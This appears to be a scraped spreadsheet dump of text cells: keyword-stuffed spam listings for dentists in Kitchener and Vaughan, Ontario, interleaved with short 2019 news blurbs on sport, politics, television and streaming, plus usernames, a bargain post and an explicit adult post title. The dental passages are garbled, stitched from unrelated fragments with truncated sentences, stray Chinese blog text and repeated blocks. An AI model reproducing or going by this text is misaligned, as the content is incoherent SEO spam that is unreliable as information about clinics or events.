-&gt; Source : http://bestdentistkitchener.ca/blog/index.php/2019/01/09/top-dental-clinic-near-kitchener-ontario-7. . The program is contracted to Student Care, which also takes care of health and dental benefits for UW students. On top of the. Patients of all ages are welcome at this dental clinic located at Kitchener in Ontario and the main objective of the team is to care for their smiles. The dentists and their team are highly trained and have wide experience in enhancing the denta. Most Popular Dentist In Kitchener Kid Friendly Dental Clinic Near Kitchener Ontario Most Popular Dentist Near Kitchener A Kitchener man quit his job to work full time on his YouTube channel. The gamble paid off – James Hobson just bought a house in Kitchener, near the Waterloo. Most Popular Dental Clinic In Kitchener Most Popular Dental Clinic Near Kitchener Locating an Orthomolecular Provider. Friendliest Dentist In Kitchener Ontario Great apartment in a century house that is a 10-minute walk to either downtown Ki. University of Waterloo students can now opt in to legal coverage – The program is contracted to Student Care, which also takes care of health and dental benefits for UW students. On top of the. At long last, after more than two years of talk, studies, delays and more talk, a supervised drug consumption site is slated. Kid Friendly Dental Clinic In Kitchener Ontario Kids Dentist Kitchener, Ontario A pediatric dentist can offer comprehensive oral care specifically suited to the needs of your child. Just as you would take your child to a pediatrician to receive medical care, pediatric dentists undergo additional education and training to offer the highest standard of dental. Kid Friendly Dentist Near Kitchener We Love to See You Smile! – There is so much that goes into choosing the right dentist for you and your family. we know it’s much more than looking for a “dentist near me” online to be. and we offer a user-friendly online. An eco-friendly vision for business, from eyeglasses to toothbrushes – “I learned that they are an eco-friendly, eco-responsible optometry. Products they carry include bamboo straws and dental. Reviews on Kid Friendly Restaurants in Kitchener, ON – Fork and Cork Grill, J &amp; B Family Restaurant, Red House, The Bent Elbow, The Bauer Kitchen, The Adventurers' Guild Cafe, Pupuseria Latinos, Moose Winooski's, Country Boy Family. I asked at my favourite butcher’s where I could pick up some fresh hamburger buns near by. 7 a.m. to 3 p.m. This friendly. Kid Friendly Dentists Near Me Little kids are sensitive. They have tender features and require special treatment form all of their health issues. Even your child’s dental health requires a specialist who can treat the problem with utmost care. Most Popular Dentist In Kitchener Ontario The increase came as sales were up in most of the country’s largest markets. Double-digit price gains in several Ontario. ‘I can’t stop crying’: Taylor Swift sends Ontario fan $6K for university tuition – came on Monday when she was given a most unexpected gift. Over the weekend, Khurram posted about her financial woes on Tumblr. Most Popular Dental Clinic In Kitchener Most Popular Dental Clinic Near Kitchener Locating an Orthomolecular Provider. Friendliest Dentist In Kitchener Ontario Great apartment in a century house that is a 10-minute walk to either downtown Ki. So, who needs a drink? – And despite all the high-profile complaining, loosening provincial booze rules appears enormously popular. overturn) Ontario’s shift towards retail liberalization. Whatever the incremental effects. to be taken out as I had been told before from a previous dentist The doctor recognized that my upper teeth cause me the most embarrassment and we made out a plan to fix them, by. Cosmetic Dentist Near Kitchener ? The Bellingham Big Lots opened Thursday, July 25, at 1650 Birchwood Ave., in the former Albertsons space. It’s a bigger space than its previous spot about 200 yards away and has an expanded. Family Dentistry Practice Offers Cosmetic Dentistry There are lots of reasons to walk into the office of your local dentist near Kitchener. Regular cleanings and dental exams, a tooth ache, or even dissatisfaction with your smile make good reasons. Good dental. Cosmetic dentistry services from Kitchener East Family Dental in Kitchener, ON can make your smile brighter! Call today to learn more. As a leading dentist near Kitchener, our team is skilled in evaluating smiles and recommending treatments that can help. Top Dental Clinic In Kitchener Ontario Best Dental Clinic Near Kitchener Ontario We're a dental practice serving the Kitchener-Waterloo area committed to providing a high quality dental experience for our patients, bonding, dental implants, specialty dental services, smile makeovers and best of all – complete oral dental care (cleaning) at. Best Dentists in Kitchener, ON – Solar Dental, King Street Dental Centre, Fairway Dental Urgent Care Clinic, Arvanitis &amp; Associates Dentistry by Design, de Man &amp; Höediono Dentistry, Westheights Dental Centre, Le Nhan Nancy Denturist, Danube Dental. Lancaster Dental General Dentistry 493 Street W -&gt; Source https://www.yelp.ca/biz/lancaster-dental-kitchener Fairway dental urgent care clinic kitchener dentists fairway dental emergency clinic kitchener ontario facebook fairway dental urgent care clinic general. Top Dental Clinic In Kitchener Find the best dentist or dental clinic in Kitchener, ON offering the dental services you are looking for. The premier destination for dental clinic listings in Toronto, ON. Stanley Park Dental Centre (now known as Grand River Dental Care), proudly providing dentistry in Kitchener and Waterloo areas since 1996. Dr. Paul Tan and associates are committed to excellence in family dentistry and general dental care. We welcome new. Best Dentists in Kitchener, ON – Solar Dental, King Street Dental Centre, Fairway Dental Urgent Care Clinic, Arvanitis &amp; Associates Dentistry by Design, de Man &amp; Höediono Dentistry, Westheights Dental Centre, Le Nhan Nancy Denturist, Danube Dental. Cosmetic Dental Clinic In Kitchener Ontario Cambridge Dentist,Family and Cosmetic Dentistry in Kitchener/Waterloo/Cambrdige. Highland Dental Office, Ottawa South Dental Office and Infinite Dental office. Dentist in Kitchener,Waterloo and Cambridge, Ontario area. 95% of our patients say they'd recommend us to friends. Get started today! Reserve an appointment online now. Dentist, cosmetic dentist, dental clinic, emergency. Dr. Hurlbut, Dr. De Miglio and their Kitchener dental team know and understand the importance. The latest in dental Best Dentists in Kitchener, ON – Solar Dental, King Street Dental Centre, Fairway Dental Urgent Care Clinic, Arvanitis &amp; Associates Dentistry by Design, de Man &amp; Höediono Dentistry, Westheights Dental Centre, Le Nhan Nancy Denturist, We're a dental practice serving the Kitchener-Waterloo area committed to providing a high quality dental experience for our patients, bonding, dental implants, specialty dental services, smile makeovers and best of all – complete oral de. Top Dental Clinic Near Kitchener Ontario Best Dentist In -&gt; Source : http://bestdentistkitchener.ca/blog/index.php/2019/01/09/top-dental-clinic-near-kitchener-ontario-7/ Fairway Dental Urgent Care Clinic Kitchener Dentists -&gt; Source . . Dentist Waterloo – Best dental clinic in Waterloo, Kitchener offering trusted emergency dental care services to clients. Call 5195768510 to book an appointment.</t>
  </si>
  <si>
    <t>I decided to give Workaway a shot in order to lay low and save a little cash while I was in Morocco. It was everything I expected and more! Here’s my experience and some tips on finding an awesome workaway. NOTE: This video is NOT affiliated, sponsored or endorsed by Workaway! MUSIC: Broke For Free […] The post Chapter 23: I Survived My First Workaway! (Tangier, Morocco) appeared first on TRAVELAMBASSADOR.CA.</t>
  </si>
  <si>
    <t>/u/wezegan</t>
  </si>
  <si>
    <t>submitted by /u/wezegan [link] [comments] The post Hot Amateur MILF Giving a Blowjob to her Man appeared first on All Amateur Blog.</t>
  </si>
  <si>
    <t>Mark Gossage</t>
  </si>
  <si>
    <t>https://bit.ly/2PctE6V BotStar Review With Full Demo and Mass Bonuses BotStar is the brand new AI Chatbot software for FaceBook … source</t>
  </si>
  <si>
    <t>From DPVA: Virginia Republicans Are At War With Each Other…Again “You guys have lost everything time and again”: Majority Leader Todd Gilbert clashes with Freitas staffer over write-in campaign in the latest intra-party fight RICHMOND, VA – With control of the General Assembly at stake and fewer than 90 days until the November elections, the Virginia Republican Party is in complete disarray after Delegate Nick Freitas failed to file the correct paperwork to appear on the ballot and must now run an expensive write-in campaign. Freitas’ incompetence could end up costing Virginia Republicans control of the House of Delegates, and tensions within the party are boiling over. Last night, Christian Heiens, a legislative assistant for Freitas, sparred with House Majority Leader Todd Gilbert in a series of increasingly nasty back-and-forth comments on Facebook. Heiens accused Gilbert of trying to intervene in the 30th District GOP Committee’s process by pressuring them to nominate another Republican and then attempting to remove a member of the committee when they wouldn’t drop Freitas. Gilbert responded by sarcastically mocking Heiens and Freitas for their failures. “Oh YOU must be the mastermind behind the scenes who would rather run a write-in campaign than try to get a Republican on the ballot in an otherwise safe district when control of the state government is at stake,” he wrote. In another sign of disarray, Republicans in the district were apparently circulating a list of possible candidates who could potentially run instead of Freitas as recently as yesterday. And a quote from Gilbert was conspicuously absent from a Virginia House GOP press release issued this morning announcing Freitas would be running a write-in campaign. “The only thing Virginia Republicans seem to agree on is that they’re in serious danger of losing their majority in the General Assembly. The Republican Party is coming apart at the seams. While they’re funding primary challenges against their own members, struggling to raise money, and forgetting to even file paperwork to get on the ballot, Democrats across the Commonwealth are organizing powerful grassroots campaigns to take the majority,” said DPVA Press Secretary Grant Fox. Divisions between party leaders came to a head earlier in the year when they fought over the nomination in the 97th House of Delegates District. Senate Majority Leader Tommy Norment backed Hanover County Supervisor Scott Wyatt, who was seeking to unseat Delegate Chris Peace because of his vote for Medicaid expansion. House of Delegates Speaker Kirk Cox backed Peace, and a contentious nominating process ensued, with both sides accusing the other of pulling undemocratic tricks to steal the nomination. Ultimately Wyatt triumphed, in part because Normenthelped bankroll the nominating convention that chose him as the party’s nominee. The infighting over Freitas is just the most recent example of the Virginia GOP losing control in a high-stakes election year. Recent fundraising reports show the Virginia Republican Party has less than $2,000 on hand and raised an embarrassing $36,385 in June.</t>
  </si>
  <si>
    <t>The new law says individuals could face fines of up to a thousand dollars a day for repeatedly failing to post the stickers, while maximum fines for corporations go as high as 10-thousand dollars a day.</t>
  </si>
  <si>
    <t>Quentin Tarantino has insisted Bruce Lee’s dialogue was based on biographical research. See full article at Film-news.co.uk » The post Quentin Tarantino defends portrayal of Bruce Lee in Once Upon a Time in Hollywood appeared first on www.cinemagotrailers.co.uk.</t>
  </si>
  <si>
    <t>The brand new streaming platform Disney Plus will be launching later this year. With plenty of information being announced at the D23 fan convention, Express.co.uk has all the information that you need about how to sign up and the cost of the service. Read on for our complete guide to Disney+, including the exciting shows you’ll be able to watch when it launches. How can you sign up to Disney Plus? Viewers will be able to sign up to the streaming platform via its website as soon as it launches. Once viewers have a subscription to the service, they will be able to access it via an app on Apple, Android, Google Chromecast and Roku TVs. Disney has confirmed that the platform will launch on November 12 across the USA, Canada and the Netherlands. Then the platform will be released on November 19 in Australia and New Zealand. READ MORE: Disney Plus UK launch date: When will Disney Plus come to UK? Disney Plus does not yet have a UK release date although according to Digital Spy, the platform is planned to be available in “nearly all major regions of the world within the next two years.” The platform will give viewers access to 25 original television series and 10 original films, documentaries and specials in its first year. Disney Plus will also include a library of 7,500 other television series and 500 films. When the service launches, one of the first shows that will be available is Star Wars spin-off The Mandalorian, which stars Pedro Pascal as a mysterious bounty hunter. READ MORE: Disney Plus trailers and MORE news: Marvel Phase 4, Star Wars Obi-Wan Other series expected in the next few years include a number of Marvel spin-offs like The Falcon and The Winter Soldier, Loki and Wandavision. Some of the newer announcements include a Lizzie McGuire reboot, which will see Hilary Duff return, and a She-Hulk series. More information will be released at the D23 expo, which is currently taking place in Anaheim, California this weekend (August 23-25). Keep your eyes peeled on Express.co.uk, which will be keeping you up to date on all of the latest news form the convention. READ MORE: Star Wars: When will Ewan McGregor’s Obi-Wan Kenobi series be set? How much will Disney Plus cost? Disney announced access to the streaming platform will cost $6.99 a month for viewers in the US. Fans can also sign up to the service annually for $69.99 in total. This means when it comes to the UK, it is expected to cost around £5.69 a month and around £57 a year. However, it is more likely that the series will be rounded up to around £5.99 a month. READ MORE: Netflix WON’T lose Disney and Marvel films forever to Disney streaming This cost will include access to four simultaneous streams at once as well as 4K streaming for fans to enjoy. If these costs remain stable, it seems they will be competing with Netflix, which currently costs £5.99 for just the standard plan. More information on costs are likely to be confirmed when the UK release date is officially announced. Express.co.uk will update this article when the official costs of the service are revealed. Disney Plus launches in the US on November 12 with the UK release still TBC. Source link</t>
  </si>
  <si>
    <t>Two workers from a CCTV firm plead guilty to accessing graphic mortuary footage, later circulated on social media, of the body of the late Argentine footballer Emiliano Sala, who was killed in a plane crash.</t>
  </si>
  <si>
    <t>Our 3 Week Southern USA Road Trip (Savannah, Charleston, South Carolina, Utah) The post Our 3 Week Southern USA Road Trip (Savannah, Charleston, South Carolina, Utah) appeared first on Travel-Store.</t>
  </si>
  <si>
    <t>Nicolas Dujovne quits as the currency plummets following the president’s astounding poll defeat. The post Argentina’s economy minister resigns as peso sheds value appeared first on NoPartySystem.Com.</t>
  </si>
  <si>
    <t>Dyson Heppell was stern in his messaging to his Essendon teammates on Monday, but the Bombers aren't panicking after Saturday night's humiliating loss to the Western Bulldogs.</t>
  </si>
  <si>
    <t>VITAMIN D is essential for healthy bones, and a lack of the vitamin can cause bones to become soft and weak. It may come as a surprise that it can effect another part of the body. Daily Express :: Life and Style Feed</t>
  </si>
  <si>
    <t>Gateway Pediatric Dentistry is looking for a Dental Assistant to join our very busy practice at our newest location in St. Albert. The position is 5 days per week (no evenings or weekends!) The successful candidate should have an excitement to work with children, a passion for oral health, and be self motivated. Daily Responsibilities .. Read more</t>
  </si>
  <si>
    <t>Brazil's space research centre says satellite images spotted 9507 new forest fires in the country since Thursday, mostly in the Amazon basin.</t>
  </si>
  <si>
    <t>Stipe Miocic knocks out Daniel Cormier at UFC 241 to win back heavyweight title – The Sun Original Source STIPE MIOCIC is once again UFC heavyweight champion – leaving Daniel Cormier starring retirement in the face. Having pulled off an upset win at UFC 226 last year, DC became a two-weight champion having already held the light-heavyweight crown. 3 Stipe Miocic regained the UFC heavyweight title beating Daniel Cormier But a patient year on the sidelines saw Miocic wait for his rematch – and a succession of body shots followed by crisp boxing saw the part time Cleveland regain his belt. After the win, Miocic said:“DC’s a tough motherf**ker. I’m going to give it to him. “Thank God cause that motherf**kers tough and he kept coming. It’s a fight, anything can happen. “I knew I was hurting him, he was dropping his hands. “I’ve just got to keep working, keep working, and he was going to leave something open and I started coming over with the right hand.” The champion opened the fight with lethal leg kicks and began to catch Miocic with hooks over the top – with a first round KO repeat from last year threatening. DC landed a takedown in the opening five minutes and began to work the ground and pound to see out the opening session. In the second Cormier kept up the pressure but former Golden Gloves boxing champion Miocic was timing the champion with solid jabs and the right hand began to land. 3 Miocic knocked out Cormier in round four to win the belt DC was more active with his strikes but the solid shots of the challenger began to register. In the third round Miocic had the champion on the retreat with his relentless boxing and even scored a takedown, but Cormier was able to get back to his feet immediately. The champion was active with the jab landing against the taller challenger but the pressure of Miocic was beginning to swing the fight in his favour. Heading into round four DC was hurt with several body shots on the inside and began to look visible troubled by the hard punches to the midsection. A left-hook to the body by Miocic signalled the beginning of the end as he then unleashed a barrage of shots and dropped Cormier with a right hand before the fight was halted – and DC was beaten at heavyweight for the first time. After the loss, Cormier said: “I think he made a great adjustment like you said with the body shots. “He hit me with a number of right hands and I really didn’t feel anything so I may have taken those for granted. 3 DC was beaten at heavyweight for the first time in his career “He’s a fantastic champion. Congratulations to Stipe and his team. Live Blog FIGHT NIGHT LIVE UFC 241 LIVE REACTION – Cormier vs Miocic: How the fight unfolded ROLL THE DIAZ Nate Diaz wins UFC return against Anthony Pettis and calls out Jorge Masvidal BIG HITTERS Cormier vs Miocic: UK fight time, live stream, TV channel and undercard ROUND TWO Cormier vs Miocic tale of the tape: How fighters compare ahead of UFC 241 DIAZ RETURN Pettis vs Diaz: UK start time, live stream, TV channel and undercard NO CAIN NO GAIN Ex-UFC champ Velasquez to wrestle at Madison Square Garden on September 15 ‘NO CLASS, NO RESPECT’ Khabib says ‘crazy’ McGregor ‘lost his mind’ after alleged assault “You don’t make decisions based on emotions. This is a tough pill to swallow. “At 40 years old with so many other opportunities, I need to speak to my wife and we need to make an educated decision as to what we’re going to do.”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Stipe Miocic knocks out Daniel Cormier at UFC 241 to win back heavyweight title – The Sun appeared first on Sky-News. Source link</t>
  </si>
  <si>
    <t>PM Boris Johnson has told the European Council president he prefers to reach a deal with the EU but Britain will leave the bloc on the deadline regardless.</t>
  </si>
  <si>
    <t>Season one of the hit sit-com Friends saw Ross Geller (David Schwimmer) work his way through his complicated relationship with his ex-wife Carol (Jane Sibbett) who left him for another woman called Susan (Jessica Hecht). When it was revealed Carol was pregnant with his son, the storyline focused on Ross’ new life as a father. Though, as seasons went on, Ross seemed to see his son less and less before Ben completely disappeared from screens after he and Rachel (Jennifer Anniston) welcomed baby Emma into the world in season eight. However, one deleted scene reveals an axed plot showing Ross to be quite the dedicated father. Fans will remember the episode where Ross went to London to marry Emily (Helen Baxendale) before he called her Rachel at the alter thus causing the whole courtship to fall through. However, a deleted scene recently surfaced adding to the London storyline, revealing that Ross tried to persuade his ex-wife to start a new life in London so he could be closer to Ben. In the scene Carol says: “Ross we are not moving to London, we already have lives here!” To which Ross pleads with her, saying: “It would be great! They have great theatre, great accents, tea, they have a Queen”. Moreover, a young Ben running towards Ross as he embraces his son in his arms. Ross says: “Guess what we’re moving to London!” READ MORE: Friends: Rachel’s shock pregnancy error revealed in clue fans missed Of course his ex-wife and Susan disputed taking their life overseas, making it clear it wasn’t going to happen. Pointing at Ben Ross said, “Look, he want’s to go” To which Carol responded: “Yeah, we leave all our big decisions to the three year old”. Therefore, it seems as though Ross did want his son around despite Ben’s absence from later series and Ross’ women-focused storylines. This comes after fans noticed something strange about Rachel’s pregnancy dates. According to Reddit user FrostedMiniWheats123, creators slipped up with the timing of the pregnancy, accidentally making Rachel’s pregnancy last an entire year. The user explained: “Just watched through all the seasons of Friends for the millionth time and realised a huge continuity error. “In season seven, episode 17, The One with the Cheap Wedding Dress, Monica says she is getting married May 15th. “From season eight, episode one, The One After I Do, we find out Rachel is officially pregnant and has been for at least a couple weeks.” “It has to be sometime in October, which means Rachel should be at least 5 months pregnant and she doesn’t even have a baby bump.” Friends is available on Netflix. Source link</t>
  </si>
  <si>
    <t>The Team Principal of the Renault F1 Team, Cyril Abiteboul, expressed his disappointment at the team’s performance during the Hungarian Grand Prix at the Hungaroring at the weekend, calling it “a poor result”, with neither Daniel Ricciardo nor Nico Hülkenberg able to bring home any points. Hülkenberg started in eleventh position and finished twelfth, while his team-mate Ricciardo started in twentieth as a result of changing the power unit and managed to recover to fourteenth. Abiteboul praised the overall efforts of his drivers, saying that they both made the best of the difficult situations they found themselves in. “A poor result today with both cars outside of the top ten,” he said. “With Nico we were targeting points, but with an engine having to run in safe mode and a very modest advantage over the Soft tyre starters, we could not make our strategy really work.” He also praised Ricciardo after the Australian’s recovery drive from the back of the grid, also noting that he was able to bring the fight to Haas F1 Team‘s Kevin Magnussen. “Daniel ran a good race, but starting last is always going to be a challenge at a track like Budapest,” said Abiteboul. “He still managed to gain several positions and had a good fight with Magnussen until the last corner, showing that he is a fighter who does not surrender.” Abiteboul concluded that Riccardo’s attitude should be an ‘inspiration’ as everyone heads into the summer break, time they will use to recharge and regroup ahead of the second half the season, which resumes on September 1 at Spa-Francorchamps for the Belgian Grand Prix. “His attitude on track must be an inspiration for us as we head towards the summer break, with a first half of the season well below our objectives,” admitted Abiteboul.</t>
  </si>
  <si>
    <t>The firm said it would no longer listen in to players using the console. The post Microsoft halts listening in to Xbox gamers appeared first on Education - Career - Word Games - Distance learning.</t>
  </si>
  <si>
    <t>thangcuoi</t>
  </si>
  <si>
    <t>Adguard is currently running a (USA) back to school campaign of 35% off their licences. This works out to be $21.78 for one lifetime licence for Android/iOS. The coupon code is not needed if you use the link provided. Pro tips : The 35% off still applies if you connect via VPN through Russia for a bigger discount. I purchased 2x lifetime mobile device licenses for 454 ruble = A$10.09. Pay with your 28 Degrees Master card if you have one. Mine prompted me for a one time pin it sent to my phone. An extra security step since PayPal is not a payment option. Discussion about Adguard vs other adblocker can be found in previous post. https://www.ozbargain.com.au/node/419617 The short version is that the paid Adguard allows blocking of ads within apps, not just browsers by filtering all traffic through a local VPN on your device. Your device does not need to be rooted. From my personal experience using the 7 days trial, Adguard block popup on click ads that Blockada missed.</t>
  </si>
  <si>
    <t>A team of astronomers has discovered a second giant planet in orbit around alpha Pictoris, a star that is relatively young (23 million years old) and close (63.4 light years), and surrounded by a disk of dust. The alpha Pictoris system has fascinated astronomers for the last 30 years since it enables them to observe a planetary system in the process of forming around its star.</t>
  </si>
  <si>
    <t>“I learned that they are an eco-friendly, eco-responsible optometry. Today more than 50 dental clinics hand out OLA Bamboo. it makes sense to have access to a good kid-friendly dental clinic, like the Mackenzie Dental Centre. Moderate Sedation. Whether you have a family dentist in Vaughan, or in Toronto, the clinic office should be clean and orderly. Anything short for a. Taghizadeh and the dedicated team at Hummingbird Dental. Thornhill, Vaughan, Aurora or surrounding communities in the GTA, we are accepting new patients. There is so much that goes into choosing. Children's Dentistry Vaughan For children’s dentistry in Vaughan, local patients can rely on the Mackenzie Dental Centre for a welcome and child-friendly environment. Particularly in their early years, children need more specialized dental care. For some, it’s. Friendliest Dentist In Vaughan Sunrise Dental – Vaughan – phone number, website, address &amp; opening hours – ON – Teeth Whitening Services, Dentists. Dr. Bhandal and his staff offer the friendliest service I have experienced ever in dental care. The appointments are scheduled and the staff. I've been thought a few dentist in the past and I honestly can The family-friendly event will take place in the parking lot and. Free parking will be available in the center’s dental. The day Grafton’s water fluoridation fight descended into bloodshed – But what should have been a family-friendly celebration of the jacaranda tree in full. According to Ken, who followed in. Find Dentists in Vaughan, ON. Listings include Vaughan Children's Dentistry, Tasios Orthodontics, Vibrant Square Dental, Vaughan Orthodontics, Marketplace Dentistry and UShineDental. Click on each in the list below the map for more information.</t>
  </si>
  <si>
    <t>Reserve Governor Philip Lowe has argued central banks are carrying too much of the burden in the effort to improve a sluggish global economic environment.</t>
  </si>
  <si>
    <t>NSW resident Sonia Smallacombe says she was racially targeted by a police auxiliary stationed outside a bottle shop who demanded she produce hotel receipts to prove where she was staying.</t>
  </si>
  <si>
    <t>Religious beliefs are certainly not an acceptable justification for harming other people or turning a blind eye to child abuse.</t>
  </si>
  <si>
    <t>phearaa</t>
  </si>
  <si>
    <t>Comes with a 120 night trial, free Australia wide delivery, and Australian made</t>
  </si>
  <si>
    <t>9 subtle ways technology is making humanity worse Original Source Young people are losing the ability to interact face-to-face.Rich Fury/Invision/AP For many of us fully immersed in the digital age, it’s hard to imagine a world before the advent of the internet, cloud storage, and smartphones. Experts have found that in addition to making our lives more convenient, but there’s a negative side to technology — it can be addicting and it can hurt our communication skills. Extended screen time can result in health ramifications like insomnia, eyestrain, and increased anxiety and depression. Visit Business Insider’s homepage for more stories. Technology has become so ingrained in society — and our daily lives — that it’s hard to remember what the world was like before it. Can you imagine doing your job without the help of technology of any kind? What about communicating? Or traveling? Or entertaining yourself? Read more: 5 major differences between the lives of millennials and baby boomers While we owe a debt of gratitude to the brilliant minds who have gifted us such innovations, it would be shortsighted to consider technology as solely a boon to humanity. Often, it can be a bane, having both seen and unseen effects of innumerable kinds on individuals, groups, and mankind as a whole. Here are nine ways technology has made humanity worse. 9 subtle ways technology is making humanity worse For many of us fully immersed in the digital… 9 subtle ways technology is making humanity worse Features,Technology,Phones,Digital Age,BI-freelancer,Smartphones,Blue Light,Psychology,Communication 9 subtle ways technology is making humanity worse 2019-08-23T17:20:00+02:00 2019-08-22T22:49:45+02:00 2019-08-23T17:22:12+02:00 https://static4.businessinsider.de/image/5c9a3b5cd2ce7823e55cb116-500-250/9-subtle-ways-technology-is-making-humanity-worse.jpg BusinessInsiderDe https://www.businessinsider.de/assets/images/logos/og-image-logo.png For many of us fully immersed in the digital age, it’s hard to imagine a world before the advent of the internet, cloud storage, and smartphones. Experts have found that in addition to making our lives more convenient, but there’s a negative side to technology — it can be addicting and it can hurt our communication skills. Extended screen time can result in health ramifications like insomnia, eyestrain, and increased anxiety and depression. Visit Business Insider’s homepage for more stories. Technology has become so ingrained in society — and our daily lives — that it’s hard to remember what the world was like before it. Can you imagine doing your job without the help of technology of any kind? What about communicating? Or traveling? Or entertaining yourself? Read more: 5 major differences between the lives of millennials and baby boomers While we owe a debt of gratitude to the brilliant minds who have gifted us such innovations, it would be shortsighted to consider technology as solely a boon to humanity. Often, it can be a bane, having both seen and unseen effects of innumerable kinds on individuals, groups, and mankind as a whole. Here are nine ways technology has made humanity worse. international 9 subtle ways technology is making humanity worse For many of us fully immersed in the digital… 9 subtle ways technology is making humanity worse Features,Technology,Phones,Digital Age,BI-freelancer,Smartphones,Blue Light,Psychology,Communication 9 subtle ways technology is making humanity worse 2019-08-23T17:20:00+02:00 2019-08-23T17:22:12+02:00 https://static4.businessinsider.de/image/5c9a3b5cd2ce7823e55cb116-500-250/9-subtle-ways-technology-is-making-humanity-worse.jpg BusinessInsiderDe https://www.businessinsider.de/assets/images/logos/og-image-logo.png For many of us fully immersed in the digital age, it’s hard to imagine a world before the advent of the internet, cloud storage, and smartphones. Experts have found that in addition to making our lives more convenient, but there’s a negative side to technology — it can be addicting and it can hurt our communication skills. Extended screen time can result in health ramifications like insomnia, eyestrain, and increased anxiety and depression. Visit Business Insider’s homepage for more stories. Technology has become so ingrained in society — and our daily lives — that it’s hard to remember what the world was like before it. Can you imagine doing your job without the help of technology of any kind? What about communicating? Or traveling? Or entertaining yourself? Read more: 5 major differences between the lives of millennials and baby boomers While we owe a debt of gratitude to the brilliant minds who have gifted us such innovations, it would be shortsighted to consider technology as solely a boon to humanity. Often, it can be a bane, having both seen and unseen effects of innumerable kinds on individuals, groups, and mankind as a whole. Here are nine ways technology has made humanity worse. international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9 subtle ways technology is making humanity worse appeared first on Sky-News. Follow us on our social networks Posted on Bible Of Sport Bible Of Sport - Instagram Bible Of Sport - Twitter Bible Of Sport - Facebook Source link</t>
  </si>
  <si>
    <t>Durim Halimi</t>
  </si>
  <si>
    <t>Newcastle United and 12 other Premier League clubs entered the Carabao Cup in the second round yesterday. Newcastle United have entered the Carabao Cup in the second round of the tournament and they were drawn against Leicester City in the North region. Unlike most Premier League rivals who were drawn against inferior opposition from lower […] Newcastle United should sit these players in... Source</t>
  </si>
  <si>
    <t>Bianca Andreescu is through to the second round of the U.S. Open after posting a 6-2, 6-4 win over Katie Volynets on Tuesday in New York. CBC | Sports News With upset win, veteran Pospisil makes biggest splash on Canadian-filled day at U.S. Open</t>
  </si>
  <si>
    <t>Best Cosmetic Dentists in Kitchener, ON – Arvanitis &amp; Associates Dentistry by Design, Dawson Dental Centre, Waterloo Smiles Dentistry, Solar Dental, King Street Dental Centre, Laurentian Dental Centre, Michael Bensky, DDS, Grand River Dental Care, Kitchener dentist, Kitchener East Family Dental is a local, trusted dental practice offering general and cosmetic dentistry, pediatric dentistry, sedation dentistry, dental implants, tooth whitening &amp; other dental care. Call today to make an appointment! Technology is Critical to Modern Dental Care: Choose Carefully – Everyone needs to see the dentist. not yet near to being complete, let alone the multiple diseases and conditions are. Most Popular Dental Clinic In Kitchener Ontario Patients of all ages are welcome at this dental clinic located at Kitchener in Ontario and the main objective of the team is to care for their smiles. The dentists and their team are highly trained and have wide experience in enhancing the dental and oral health of. Best Dentists in Kitchener, ON – Solar Dental, King Street Dental Centre, Fairway Dental Urgent Care Clinic, Arvanitis &amp; Associates Dentistry by Design, de Man &amp; Höediono Dentistry, Westheights Dental Centre, Le Nhan Nancy Denturist, Danube Dental. Looking for dentist or dental care clinic in Kitchener, ON? Contact Kaur, P DDS (P Kaur DDS) located in 1190 King St E. We pride ourselves in giving you a personalised attention and offer you a full range of dental services using the most current s. Home. Best Dental Clinic In Kitchener Preferred Dental Clinic In Kitchener Ontario We're a dental practice serving the Kitchener-Waterloo area committed to providing a high quality dental experience for our patients, Danube Dental Clinic 77 Water Street North, Kitchener, ON N2H 5A6 Make Appointment Established dental clinic centrally. Highest Rated Dentist In Kitchener Tampa, FL – Westchase Esthetic Family Dentistry is the top-rated dentist in Tampa, FL. The dental practice has catered to the dental care and treatment needs of residents of their community for over. Search or browse RateMDs for trusted reviews &amp; ratings on doctors in Kitchener. We're the original doctor ratings site with over 2 million reviews. Name Toggle navigation Menu Find A Doctor Find A Facility Health News Health Forum Best Doctors in Kitchener. Reviews on Dentist Reviews in Kitchener, ON – Solar Dental, King Street Dental Centre, Waterloo Smiles Dentistry, Fairway Dental Urgent Care Clinic, Lackner Woods Family Dentistry, de Man &amp; Höediono Dentistry, Arvanitis &amp; Associates Dentistry by. comfort and happiness is what propels me forward as a research scientist and practitioner of dentistry." Dr. Kravitz has also. Highest Rated Dentist In Kitchener Edward Paul Sheringham MBE (born 2 April 1966) is an English football manager and former player. Sheringham played as a forward, mostly as a second striker, in a 24-year professional career. Sheringham began his career. Kia has more vehicles with Top Safety Pick (TSP) and Top Safety Pick Plus (TSP+) ratings than any other brand. The new. Highest Rated Most Reviewed Distance Bird's-eye View Driving (8 km.) Biking (4 km.) Walking (2 km.) Within 4 blocks Price $ $$ $$$ $$$$ Features Open Now-:– am By Appointment Only Sponsored Results Apothecare Pharmacy Pharmacy. Cosmetic Dental Clinic Near Kitchener At Sherwood Dental Care – Dentist in Kitchener we take great pleasure and satisfaction in providing complete family dental care in the Kitchener and Waterloo area for all patients. At our Kitchener clinic, we offer complete dental care services that will make sure that your teeth remain strong and in good condition. Find Cosmetic Dentistry near you Companies having. web (15) email (14) verified listing (2) opening hours (16) Categories. Technology is Critical to Modern Dental Care: Choose Carefully – Why &amp; How an Outdated Dental Clinic. yet near to being complete, let alone the multiple diseases and conditions are still. At a groundbreaking ceremony last July, officials said the new site will provide the in-house services currently offered at. Friendliest Dental Clinic Near Kitchener Best Dentists in Kitchener, ON – Solar Dental, King Street Dental Centre, Fairway Dental Urgent Care Clinic, Arvanitis &amp; Associates Dentistry by Design, de Man &amp; Höediono Dentistry, Westheights Dental Centre, Le Nhan Nancy Denturist, Danube Dental. Friendliest Dental Clinic Near Kitchener Ontario cornekiuse的部落格 跳到主文 歡迎光臨cornekiuse在痞客邦的小天地 部落格全站分類：居家設計 Franklin St. North, Kitchener, near Ottawa and Franklin) 晚会时间：二月三日周六晚7pm到12am。 Parking, left side. Opened about a month ago, Sam’s Kitchen is run by the friendly M. Panisamy or Samy. Last year he operated an eatery near. Friendliest Dental Clinic Near Kitchener Innaloo Dental Clinic Announces Sunday Opening Hours to Better Serve the North-West Perth Suburbs – Local dentist office near Innaloo is now open for business on Sunday to allow more patients to visit their clinic. This. Mi Dental in Kitchener, Waterloo are committed in providing you and your family with the best dental care solutions. Visit the Mi Dental office today and receive the best preventive, restorative, cosmetic, and emergency care you need. It is an excellent location and is going to bring a family-friendly atmosphere to Hobart and surrounding. All of its. Number 1 Dentist In Kitchener Ontario but three common butterflies in Ontario are significantly down in numbers: the cabbage, common sulphur and alfalfa (or orange. In Quebec, wage growth sped up to nearly 6.2 per cent, while 